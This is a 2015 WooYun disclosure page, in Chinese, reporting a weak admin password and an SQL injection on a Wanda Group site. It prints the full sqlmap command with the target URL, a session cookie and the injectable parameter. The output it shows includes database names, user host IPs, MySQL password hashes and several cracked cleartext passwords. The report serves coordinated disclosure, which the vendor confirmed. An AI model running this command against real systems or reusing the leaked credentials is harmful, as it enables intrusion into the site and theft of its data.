当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0120662

漏洞标题:万达旗下汉秀网注入漏洞

相关厂商:大连万达集团股份有限公司

漏洞作者: cainpoe

提交时间:2015-06-15 18:36

修复时间:2015-07-31 11:10

公开时间:2015-07-31 11:10

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-15: 细节已通知厂商并且等待厂商处理中
2015-06-16: 厂商已经确认,细节仅向厂商公开
2015-06-26: 细节向核心白帽子及相关领域专家公开
2015-07-06: 细节向普通白帽子公开
2015-07-16: 细节向实习白帽子公开
2015-07-31: 细节向公众公开

简要描述:

后台弱密码可登陆,后台管理页面有注入漏洞,sqlmap加登陆cookie可注入。

详细说明:

http://redlantern.thehanshow.com/website/admin.php
后台弱密码:admin admin
cookie导出使用sqlmap工具
sqlmap -u "http://redlantern.thehanshow.com/website/admin.php?mod=opus&check=1&nowpage=3" --cookie "PHPSESSID=6ef26dec09139bbea51549fb630ae26e;admin_typeid=0;admin_typename=%E8%B6%85%E7%BA%A7%E7%AE%A1%E7%90%86%E5%91%98;admin_uname=admin;admin_username=admin" -p check

漏洞证明:

available databases [118]:
[*] 2012-c-quatre
[*] a30
[*] aaaa
[*] app_jy
[*] badonehour
[*] baicaoji
[*] c-quatreask
[*] c2
[*] c2_caplayer
[*] c2_cross
[*] c2_dekaron
[*] c3-xr-zdy
[*] c3xr
[*] c4l-140505
[*] c4lwx
[*] c5
[*] c5-newtime
[*] c5-newtime_weixin
[*] c5_pc
[*] c5greetings
[*] c5jie
[*] c5travel3
[*] c5wx
[*] citroen-c3-xr
[*] citroen_jia
[*] citroen_newyear
[*] citroen_weixin
[*] comelysee
[*] composite
[*] cquatrewx
[*] cxa30
[*] dakadahua
[*] dfct_c3xr_price
[*] dfct_c3xr_sign
[*] dfct_c3xr_zdy
[*] dfct_c5newtime_taxi
[*] dfct_christmas
[*] dfct_meetyou
[*] dfctc3xrypqx
[*] dfpv-friend
[*] dfpv-friend2
[*] dfpv-spokesman
[*] dfpv-wcup
[*] dfpv_ax7
[*] dfpv_ax7_animate
[*] dfpv_ax7_chezhan2
[*] dfpv_ax7_lets
[*] dfpv_ax7_zhuwei
[*] dfpv_c5
[*] dfpv_nanshen
[*] dfpv_summer
[*] dfpv_weixin
[*] dftc_c5saying
[*] dfxk_carshow
[*] dfxk_hongbao
[*] dfxk_pintu
[*] dfxk_tenyear_xinsheng
[*] discuz_list
[*] dongbiao2008
[*] dongbiao308
[*] dongfengcar
[*] ely_gohome
[*] ely_qualitynumberone
[*] elysee_panzhufeng
[*] elysee_weixin
[*] elysee_wtcc
[*] elysee_zuche
[*] fenghui201407
[*] festival
[*] gacgonow_bbs
[*] gonowauto
[*] gonowauto_naked
[*] gonowauto_tuhao
[*] guanqigame
[*] guoxinfrontcase
[*] gx6_gameddp
[*] gxsurvey
[*] hanshow_gohome
[*] hanshow_pintu
[*] hanshow_redbag
[*] hanshow_reunion
[*] herborist_tj
[*] hongyu
[*] information_schema
[*] inoherb_wd
[*] inoherbweb
[*] insunsign
[*] jingxiaoshang
[*] lilin
[*] maka
[*] minisite
[*] mmeju
[*] mysql
[*] newcquatre
[*] newelysee
[*] newelysee2012
[*] newelysee_mohe
[*] newelyseebbs
[*] ninelove
[*] nsdb
[*] peugeot508
[*] qingming_up
[*] qiuwang
[*] quatre_shijia
[*] templatesite
[*] thehanshow
[*] timeline
[*] tongji_wx
[*] tongyi_tea
[*] wandahalloween
[*] wandamoviepark
[*] wandawsj
[*] wdbz
[*] wdly
[*] wtcc_weixin
[*] wudongbali
[*] wxTest
[*] zhabei_hongbao
[*] ''@'localhost'
[*] 'badonehour'@'%'
[*] 'c2'@'localhost'
[*] 'citroen_sql'@'%'
[*] 'comelysee'@'119.97.224.114'
[*] 'comelysee'@'localhost'
[*] 'composite'@'119.97.224.114'
[*] 'composite'@'localhost'
[*] 'jy_app'@'%'
[*] 'root'@'119.97.224.114'
[*] 'root'@'122.49.20.11'
[*] 'root'@'122.49.20.27'
[*] 'root'@'122.49.20.29'
[*] 'root'@'122.49.20.9'
[*] 'root'@'122.49.20.99'
[*] 'root'@'127.0.0.1'
[*] 'root'@'localhost'
[*] 'templatesite'@'119.97.224.114'
[*] 'templatesite'@'localhost'
[*] 'tongji'@'%'
[*] 'wdbz'@'127.0.0.1'
[*] 'wdyb'@'%'

database management system users password hashes:
[*] badonehour [1]:
password hash: *44D31BDB19407095F216BF54EEEDC376EBE6E8F8
[*] c2 [1]:
password hash: *34D5BFF2C00B8FAE2AF02FCD21A0D36A6E233FAD
clear-text password: c2
[*] citroen_sql [1]:
password hash: *E34A215C569995C2D3714F341F60416E9B772CFA
[*] comelysee [1]:
password hash: *01E64FEE49F7978DD1D4D7E7744DB36DBFD8A633
clear-text password: comelysee
[*] composite [1]:
password hash: *A4AB24C0D164DFDC003FD736741572A4B34539AE
[*] jy_app [1]:
password hash: *ABB81A0DFF17A7FCD561CC9E8BB35BAE9F0DEF0F
[*] root [2]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B
clear-text password: root
password hash: NULL
[*] templatesite [1]:
password hash: *A4AB24C0D164DFDC003FD736741572A4B34539AE
[*] tongji [1]:
password hash: *1AFE9E62C661C8B350188FB88420AB4B846CB7DD
[*] wdbz [1]:
password hash: *D66077E5E6DA7E2751B612899925BD59C3420451
[*] wdyb [1]:
password hash: *80613FE7F3E9C704E70766F6435B8C09632B1D10
clear-text password: wdyb
数据表好多118个。里面表的数据也不少。没有仔细看。就到这吧

修复方案:

密码修改,代码过滤

版权声明:转载请注明来源 cainpoe@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:6

确认时间:2015-06-16 11:09

厂商回复:

感谢cainpoe同学的关注与贡献,马上通知业务整改

最新状态:

暂无